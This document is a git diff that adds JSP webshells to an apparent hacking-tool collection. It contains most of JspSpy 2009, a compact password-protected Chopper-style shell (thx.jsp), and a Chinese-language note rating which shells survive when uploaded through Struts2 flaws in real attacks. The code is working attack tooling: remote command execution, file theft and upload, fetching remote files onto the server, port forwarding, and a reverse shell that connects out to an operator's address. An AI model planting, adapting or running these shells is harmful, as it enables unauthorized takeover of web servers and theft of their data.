    Instead »"+ +"year:"+ +""+ +"month:"+ +""+ +"day:"+ +""+ +""+ +"hour:"+ +""+ +"minute:"+ +""+ +"second:"+ +""+ +"

    "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class EditPropertyInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String f = request.getParameter("file"); +File file = new File(f); +if (!file.exists()) +return; + +String year = request.getParameter("year"); +String month = request.getParameter("month"); +String date = request.getParameter("date"); +String hour = request.getParameter("hour"); +String minute = request.getParameter("minute"); +String second = request.getParameter("second"); + +Calendar cal = Calendar.getInstance(); +cal.set(Calendar.YEAR,Integer.parseInt(year)); +cal.set(Calendar.MONTH,Integer.parseInt(month)-1); +cal.set(Calendar.DATE,Integer.parseInt(date)); +cal.set(Calendar.HOUR,Integer.parseInt(hour)); +cal.set(Calendar.MINUTE,Integer.parseInt(minute)); +cal.set(Calendar.SECOND,Integer.parseInt(second)); +if(file.setLastModified(cal.getTimeInMillis())){ +JSession.setAttribute(MSG,"Reset File Property Success!"); +} else { +JSession.setAttribute(MSG,"Reset File Property Failed!"); +} +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VShell +private static class VsInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String cmd = request.getParameter("command"); +String program = request.getParameter("program"); +if (cmd == null) cmd = "cmd.exe /c set"; +if (program == null) program = "cmd.exe /c net start > "+SHELL_DIR+"/Log.txt"; +if (JSession.getAttribute(MSG)!=null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +out.println(""+ +"
    "+ +"
    "+ +"

    Execute Program »

    "+ +"

    "+ +""+ +""+ +"Parameter
    "+ +""+ +"

    "+ +"
    "+ +"
    "+ +"

    Execute Shell »

    "+ +"

    "+ +""+ +""+ +"Parameter
    "+ +""+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ShellInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String type = request.getParameter("type"); +if (type.equals("command")) { +ins.get("vs").invoke(request,response,JSession); +out.println("
    "); +out.println("
    ");
+String command = request.getParameter("command");
+if (!Util.isEmpty(command)) {
+Process pro = Runtime.getRuntime().exec(command);
+BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
+String s = reader.readLine();
+while (s != null) {
+out.println(Util.htmlEncode(Util.getStr(s)));
+s = reader.readLine();
+}
+reader.close();
+out.println("
    "); +} +} else { +String program = request.getParameter("program"); +if (!Util.isEmpty(program)) { +Process pro = Runtime.getRuntime().exec(program); +JSession.setAttribute(MSG,"Program Has Run Success!"); +ins.get("vs").invoke(request,response,JSession); +} +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String path = request.getParameter("path"); +if (Util.isEmpty(path)) +return; +File f = new File(path); +if (!f.exists()) +return; +response.setHeader("Content-Disposition","attachment;filename="+URLEncoder.encode(f.getName(),PAGE_CHARSET)); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(f)); +BufferedOutputStream output = new BufferedOutputStream(response.getOutputStream()); +byte[] data = new byte[1024]; +int len = input.read(data); +while (len != -1) { +output.write(data,0,len); +len = input.read(data); +} +input.close(); +output.close(); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VDown +private static class VdInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String savepath = request.getParameter("savepath"); +String url = request.getParameter("url"); +if (Util.isEmpty(url)) +url = "http://www.baidu.com/"; +if (Util.isEmpty(savepath)) { +savepath = JSession.getAttribute(CURRENT_DIR).toString(); +} +if (!Util.isEmpty(JSession.getAttribute("done"))) { +Util.outMsg(out,"Download Remote File Success!"); +JSession.removeAttribute("done"); +} +out.println("
    "+ +"
    "+ +"

    Remote File DownLoad »

    "+ +"

    "+ +""+ +"Remote File URL:"+ +" "+ +"Save Path:"+ +""+ +""+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownRemoteInvoker extends DefaultInvoker { +public boolean doBefore(){return true;} +public boolean doAfter(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String downFileUrl = request.getParameter("url"); +String savePath = request.getParameter("savepath"); +if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath)) +return; +URL downUrl = new URL(downFileUrl); +URLConnection conn = downUrl.openConnection(); +BufferedInputStream in = new BufferedInputStream(conn.getInputStream()); +BufferedOutputStream out = new BufferedOutputStream(new FileOutputStream(new File(savePath))); +byte[] data = new byte[1024]; +int len = in.read(data); +while (len != -1) { +out.write(data,0,len); +len = in.read(data); +} +in.close(); +out.close(); +JSession.setAttribute("done","d"); +ins.get("vd").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class IndexInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +ins.get("filelist").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MkDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String name = request.getParameter("name"); +File f = new File(name); +if (!f.isAbsolute()) { +String path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path += "/"; +path += name; +f = new File(path); +} +f.mkdirs(); +JSession.setAttribute(MSG,"Make Directory Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MoveInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String src = request.getParameter("src"); +String target = request.getParameter("to"); +if (!Util.isEmpty(target) && !Util.isEmpty(src)) { +File file = new File(src); +if(file.renameTo(new File(target))) { +JSession.setAttribute(MSG,"Move File Success!"); +} else { +String msg = "Move File Failed!"; +if (file.isDirectory()) { +msg += "The Move Will Failed When The Directory Is Not Empty."; +} +JSession.setAttribute(MSG,msg); +} +response.sendRedirect(SHELL_NAME+"?o=index"); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class RemoteDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String dir = request.getParameter("dir"); +File file = new File(dir); +if (file.exists()) { +deleteFile(file); +deleteDir(file); +} + +JSession.setAttribute(MSG,"Remove Directory Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +public void deleteFile(File f) { +if (f.isFile()) { +f.delete(); +}else { +File[] list = f.listFiles(); +for (File ff:list) { +deleteFile(ff); +} +} +} +public void deleteDir(File f) { +File[] list = f.listFiles(); +if (list.length == 0) { +f.delete(); +} else { +for (File ff:list) { +deleteDir(ff); +} +deleteDir(f); +} +} +} +private static class PackBatchInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (Util.isEmpty(files)) +return; +String saveFileName = request.getParameter("savefilename"); +File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +String[] arr = files.split(","); +for (String f:arr) { +File pF = new File(JSession.getAttribute(CURRENT_DIR).toString(),f); +ZipEntry entry = new ZipEntry(pF.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(pF); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +zout.close(); +JSession.setAttribute(MSG,"Pack Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class PackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String packedFile = request.getParameter("packedfile"); +if (Util.isEmpty(packedFile)) +return; +String saveFileName = request.getParameter("savefilename"); +File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +File pF = new File(packedFile); +ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +String base = ""; +if (pF.isDirectory()) { +zipDir(pF,base,zout); +} else { +zipFile(pF,base,zout); +} +zout.close(); +JSession.setAttribute(MSG,"Pack File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +public void zipDir(File f,String base,ZipOutputStream zout) throws Exception { +if (f.isDirectory()) { +File[] arr = f.listFiles(); +for (File ff:arr) { +String tmpBase = base; +if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/")) +tmpBase += "/"; +zipDir(ff,tmpBase+f.getName(),zout); +} +} else { +String tmpBase = base; +if (!Util.isEmpty(tmpBase) &&!tmpBase.endsWith("/")) +tmpBase += "/"; +zipFile(f,tmpBase,zout); +} +} +public void zipFile(File f,String base,ZipOutputStream zout) throws Exception{ +ZipEntry entry = new ZipEntry(base+f.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(f); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +} +private static class UnPackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String savepath = request.getParameter("savepath"); +String zipfile = request.getParameter("zipfile"); +if (Util.isEmpty(savepath) || Util.isEmpty(zipfile)) +return; +File save = new File(savepath); +save.mkdirs(); +ZipFile file = new ZipFile(new File(zipfile)); +Enumeration e = file.entries(); +while (e.hasMoreElements()) { +ZipEntry en = (ZipEntry) e.nextElement(); +String entryPath = en.getName(); +int index = entryPath.lastIndexOf("/"); +if (index != -1) +entryPath = entryPath.substring(0,index); +File absEntryFile = new File(save,entryPath); +if (!absEntryFile.exists() && (en.isDirectory() || en.getName().indexOf("/") != -1)) +absEntryFile.mkdirs(); +BufferedOutputStream output = null; +BufferedInputStream input = null; +try { +output = new BufferedOutputStream( +new FileOutputStream(new File(save,en.getName()))); +input = new BufferedInputStream( +file.getInputStream(en)); +byte[] b = new byte[1024]; +int len = input.read(b); +while (len != -1) { +output.write(b, 0, len); +len = input.read(b); +} +} catch (Exception ex) { +} finally { +try { +if (output != null) +output.close(); +if (input != null) +input.close(); +} catch (Exception ex1) { +} +} +} +file.close(); +JSession.setAttribute(MSG,"Unzip File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VMapPort +private static class VmpInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object localIP = JSession.getAttribute("localIP"); +Object localPort = JSession.getAttribute("localPort"); +Object remoteIP = JSession.getAttribute("remoteIP"); +Object remotePort = JSession.getAttribute("remotePort"); +Object done = JSession.getAttribute("done"); + +JSession.removeAttribute("localIP"); +JSession.removeAttribute("localPort"); +JSession.removeAttribute("remoteIP"); +JSession.removeAttribute("remotePort"); +JSession.removeAttribute("done"); + +if (Util.isEmpty(localIP)) +localIP = InetAddress.getLocalHost().getHostAddress(); +if (Util.isEmpty(localPort)) +localPort = "3389"; +if (Util.isEmpty(remoteIP)) +remoteIP = "www.baidu.com"; +if (Util.isEmpty(remotePort)) +remotePort = "80"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); + +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +""+ +"

    PortMap >>

    "+ +"
    "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Local Ip :"+ +" "+ +" Local Port :"+ +" Remote Ip :"+ +" Remote Port :"+ +"

    "+ +" "+ +" "+ +"
    "+ +"
    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//StopMapPort +private static class SmpInvoker extends DefaultInvoker { +public boolean doAfter(){return true;} +public boolean doBefore(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket server = (ServerSocket)JSession.getAttribute(PORT_MAP); +server.close(); +} +JSession.setAttribute("done","Stop Success!"); +ins.get("vmp").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MapPortInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String localIP = request.getParameter("localIP"); +String localPort = request.getParameter("localPort"); +final String remoteIP = request.getParameter("remoteIP"); +final String remotePort = request.getParameter("remotePort"); +if (Util.isEmpty(localIP) || Util.isEmpty(localPort) || Util.isEmpty(remoteIP) || Util.isEmpty(remotePort)) +return; +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +final ServerSocket server = new ServerSocket(); +server.bind(new InetSocketAddress(localIP,Integer.parseInt(localPort))); +JSession.setAttribute(PORT_MAP,server); +new Thread(new Runnable(){ +public void run(){ +while (true) { +Socket soc = null; +Socket remoteSoc = null; +DataInputStream remoteIn = null; +DataOutputStream remoteOut = null; +DataInputStream localIn = null; +DataOutputStream localOut = null; +try{ +soc = server.accept(); +remoteSoc = new Socket(); +remoteSoc.connect(new InetSocketAddress(remoteIP,Integer.parseInt(remotePort))); +remoteIn = new DataInputStream(remoteSoc.getInputStream()); +remoteOut = new DataOutputStream(remoteSoc.getOutputStream()); +localIn = new DataInputStream(soc.getInputStream()); +localOut = new DataOutputStream(soc.getOutputStream()); +this.readFromLocal(localIn,remoteOut); +this.readFromRemote(soc,remoteSoc,remoteIn,localOut); +}catch(Exception ex) +{ +break; +} +} +} +public void readFromLocal(final DataInputStream localIn,final DataOutputStream remoteOut){ +new Thread(new Runnable(){ +public void run(){ +while (true) { +try{ +byte[] data = new byte[100]; +int len = localIn.read(data); +while (len != -1) { +remoteOut.write(data,0,len); +len = localIn.read(data); +} +}catch (Exception e) { +break; +} +} +} +}).start(); +} +public void readFromRemote(final Socket soc,final Socket remoteSoc,final DataInputStream remoteIn,final DataOutputStream localOut){ +new Thread(new Runnable(){ +public void run(){ +while(true) { +try{ +byte[] data = new byte[100]; +int len = remoteIn.read(data); +while (len != -1) { +localOut.write(data,0,len); +len = remoteIn.read(data); +} +}catch (Exception e) { +try{ +soc.close(); +remoteSoc.close(); +}catch(Exception ex) { +} +break; +} +} +} +}).start(); +} +}).start(); +JSession.setAttribute("done","Map Port Success!"); +JSession.setAttribute("localIP",localIP); +JSession.setAttribute("localPort",localPort); +JSession.setAttribute("remoteIP",remoteIP); +JSession.setAttribute("remotePort",remotePort); +response.sendRedirect(SHELL_NAME+"?o=vmp"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VBackConnect +private static class VbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object ip = JSession.getAttribute("ip"); +Object port = JSession.getAttribute("port"); +Object program = JSession.getAttribute("program"); +Object done = JSession.getAttribute("done"); +JSession.removeAttribute("ip"); +JSession.removeAttribute("port"); +JSession.removeAttribute("program"); +JSession.removeAttribute("done"); +if (Util.isEmpty(ip)) +ip = request.getRemoteAddr(); +if (Util.isEmpty(port) || !Util.isInteger(port.toString())) +port = "4444"; +if (Util.isEmpty(program)) +program = "cmd.exe"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +""+ +"

    Back Connect >>

    "+ +"
    "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Your Ip :"+ +" "+ +" Your Port :"+ +" Program To Back :"+ +"

    "+ +" "+ +"
    "+ +"
    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BackConnectInvoker extends DefaultInvoker { +public boolean doAfter(){return false;} +public boolean doBefore(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String ip = request.getParameter("ip"); +String port = request.getParameter("port"); +String program = request.getParameter("program"); +if (Util.isEmpty(ip) || Util.isEmpty(program) || !Util.isInteger(port)) +return; +Socket socket = new Socket(ip,Integer.parseInt(port)); +Process process = Runtime.getRuntime().exec(program); +(new StreamConnector(process.getInputStream(), socket.getOutputStream())).start(); +(new StreamConnector(socket.getInputStream(), process.getOutputStream())).start(); +JSession.setAttribute("done","Back Connect Success!"); +JSession.setAttribute("ip",ip); +JSession.setAttribute("port",port); +JSession.setAttribute("program",program); +response.sendRedirect(SHELL_NAME+"?o=vbc"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class JspEnvInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"

    System Properties >>

    "+ +"
    "+ +"
    "+ +"
      "); +Properties pro = System.getProperties(); +Enumeration names = pro.propertyNames(); +while (names.hasMoreElements()){ +String name = (String)names.nextElement(); +out.println("
    • "+Util.htmlEncode(name)+" : "+Util.htmlEncode(pro.getProperty(name))+"
      • "); +} +out.println("

    System Environment >>

      "); +Map envs = System.getenv(); +Set> entrySet = envs.entrySet(); +for (Map.Entry en:entrySet) { +out.println("
    • "+Util.htmlEncode(en.getKey())+" : "+Util.htmlEncode(en.getValue())+"
      • "); +} +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class TopInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    JspSpy Ver: 2009"+request.getHeader("host")+" ("+InetAddress.getLocalHost().getHostAddress()+")
    Logout | "+ +" File Manager | "+ +" DataBase Manager | "+ +" Execute Command | "+ +" Shell OnLine | "+ +" Back Connect | "+ +" Port Scan | "+ +" Download Remote File | "+ +" ClipBoard | "+ +" Remote Control | "+ +" Port Map | "+ +" JSP Env "+ +"
    "); +if (JSession.getAttribute(MSG) != null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VOnLineShellInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
    "); +out.println("

    Shell OnLine »


    "); +out.println("
    "+ +" "+ +" "+ +" Notice ! If You Are Using IE , You Must Input A Command First After You Start Or You Will Not See The Echo"+ +"
    "+ +"
    "+ +" "+ +"
    "+ +" "+ +" "+ +" "+ +" Auto Scroll"+ +" "+ +"
    "+ +" " +); +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class OnLineInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String type = request.getParameter("type"); +if (Util.isEmpty(type)) +return; +if (type.toLowerCase().equals("start")) { +String exe = request.getParameter("exe"); +if (Util.isEmpty(exe)) +return; +Process pro = Runtime.getRuntime().exec(exe); +ByteArrayOutputStream outs = new ByteArrayOutputStream(); +response.setContentLength(100000000); +response.setContentType("text/html;charset="+Charset.defaultCharset().name()); +OnLineProcess olp = new OnLineProcess(pro); +JSession.setAttribute(SHELL_ONLINE,olp); +new OnLineConnector(new ByteArrayInputStream(outs.toByteArray()),pro.getOutputStream(),"exeOclientR",olp).start(); +new OnLineConnector(pro.getInputStream(),response.getOutputStream(),"exeRclientO",olp).start(); +new OnLineConnector(pro.getErrorStream(),response.getOutputStream(),"exeRclientO",olp).start();//错误信息流。 +Thread.sleep(1000 * 60 * 60 * 24); +} else if (type.equals("ecmd")) { +Object o = JSession.getAttribute(SHELL_ONLINE); +String cmd = request.getParameter("cmd"); +if (Util.isEmpty(cmd)) +return; +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.setCmd(cmd); +} else { +Object o = JSession.getAttribute(SHELL_ONLINE); +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.stop(); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} + +static{ +ins.put("script",new ScriptInvoker()); +ins.put("before",new BeforeInvoker()); +ins.put("after",new AfterInvoker()); +ins.put("deleteBatch",new DeleteBatchInvoker()); +ins.put("clipboard",new ClipBoardInvoker()); +ins.put("vRemoteControl",new VRemoteControlInvoker()); +ins.put("gc",new GcInvoker()); +ins.put("vPortScan",new VPortScanInvoker()); +ins.put("portScan",new PortScanInvoker()); +ins.put("vConn",new VConnInvoker()); +ins.put("dbc",new DbcInvoker()); +ins.put("executesql",new ExecuteSQLInvoker()); +ins.put("vLogin",new VLoginInvoker()); +ins.put("login",new LoginInvoker()); +ins.put("filelist", new FileListInvoker()); +ins.put("logout",new LogoutInvoker()); +ins.put("upload",new UploadInvoker()); +ins.put("copy",new CopyInvoker()); +ins.put("bottom",new BottomInvoker()); +ins.put("vCreateFile",new VCreateFileInvoker()); +ins.put("vEdit",new VEditInvoker()); +ins.put("createFile",new CreateFileInvoker()); +ins.put("vEditProperty",new VEditPropertyInvoker()); +ins.put("editProperty",new EditPropertyInvoker()); +ins.put("vs",new VsInvoker()); +ins.put("shell",new ShellInvoker()); +ins.put("down",new DownInvoker()); +ins.put("vd",new VdInvoker()); +ins.put("downRemote",new DownRemoteInvoker()); +ins.put("index",new IndexInvoker()); +ins.put("mkdir",new MkDirInvoker()); +ins.put("move",new MoveInvoker()); +ins.put("removedir",new RemoteDirInvoker()); +ins.put("packBatch",new PackBatchInvoker()); +ins.put("pack",new PackInvoker()); +ins.put("unpack",new UnPackInvoker()); +ins.put("vmp",new VmpInvoker()); +ins.put("vbc",new VbcInvoker()); +ins.put("backConnect",new BackConnectInvoker()); +ins.put("jspEnv",new JspEnvInvoker()); +ins.put("smp",new SmpInvoker()); +ins.put("mapPort",new MapPortInvoker()); +ins.put("top",new TopInvoker()); +ins.put("vso",new VOnLineShellInvoker()); +ins.put("online",new OnLineInvoker()); +} +%> +<% +try { +String o = request.getParameter("o"); +if (!Util.isEmpty(o)) { +Invoker in = ins.get(o); +if (in == null) { +response.sendRedirect(SHELL_NAME+"?o=index"); +} else { +if (in.doBefore()) { +String path = request.getParameter("folder"); +if (!Util.isEmpty(path)) +session.setAttribute(CURRENT_DIR,path); +ins.get("before").invoke(request,response,session); +ins.get("script").invoke(request,response,session); +ins.get("top").invoke(request,response,session); +} +in.invoke(request,response,session); +if (!in.doAfter()) { +return; +}else{ +ins.get("bottom").invoke(request,response,session); +ins.get("after").invoke(request,response,session); +} +} +} else { +response.sendRedirect(SHELL_NAME+"?o=index"); +} +} catch (Exception e) { +ByteArrayOutputStream bout = new ByteArrayOutputStream(); +e.printStackTrace(new PrintStream(bout)); +session.setAttribute(CURRENT_DIR,SHELL_DIR); +Util.outMsg(out,Util.htmlEncode(new String(bout.toByteArray())).replace("\n","
    "),"left"); +bout.close(); +out.flush(); +ins.get("bottom").invoke(request,response,session); +ins.get("after").invoke(request,response,session); +} +%> diff --git a/jsp/hackk8/JSP/other/thx.jsp b/jsp/hackk8/JSP/other/thx.jsp new file mode 100644 index 0000000..7c9cbe4 --- /dev/null +++ b/jsp/hackk8/JSP/other/thx.jsp @@ -0,0 +1,59 @@ +<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%> +<%! +String Pwd="xc"; +String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);} +Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance(); +Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;} +void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();} +void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile(); +FileOutputStream os=new FileOutputStream(f);for(int i=0;i<% +String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs); +String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs); +StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|"); +if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}} +else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1)))); +while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();} +else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1)))); +bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);} +else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");} +else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");} +else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c); +MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);} +else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);} +}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString()); +%> \ No newline at end of file diff --git a/jsp/hackk8/Struts2下shell兼容性报告_K8.txt b/jsp/hackk8/Struts2下shell兼容性报告_K8.txt new file mode 100644 index 0000000..28a6646 --- /dev/null +++ b/jsp/hackk8/Struts2下shell兼容性报告_K8.txt @@ -0,0 +1,54 @@ + +struts2 环境下 jspshell 功能测试 2013.5.23 by 拉登哥哥 +看下这个报告 你们就知道 为啥s2上传的shell成功率低的原因了 +上传不成功或内容被过滤是另外的事 上传成功的shell没被过滤又不解析或报错 就是以下原因了 + +struts 2.2.1.1 默认环境下 以下报告是在这版本下的 别的版本未知 +好像默认环境没带有IO操作 还有 org.apache.jasper(S2文件上传组件) +自己找了无组件上传的jsp 也报废... + + +K8收集的(其实之前也在网上问人要来的一些 wooyun某群群主 还有其它成员) + +k8cmd.jsp 兼容性非常好 不管在s2 还是普通环境下都正常使用 +实战 支持Win/Linux 还有执行的命令通过飞刀加密发送 + +普通 cmd.jsp啥的 可以使用 不用说了 但是在linux下不行 + +other下面的大马 丢到struts2环境下 没一个能正常解析的 + +JspWebshell 1.2.jsp 能解析 但上传不了文件 好像是马写的有问题 + +JavaShell.jsp jsp-reverse.jsp 也不能解析 + +kbaidu8.jsp 兼容性8错 哥专用的 原版 jspspy 1.0 但是上传文件也是失败的 1.2版本的直接报废 + +Customize.jsp 菜刀的jsp马 本地s2环境 报错 连接上也可以操作 +实战 通过struts2的洞 上传过去的 功能就废了(linux下) win的还未测试 + 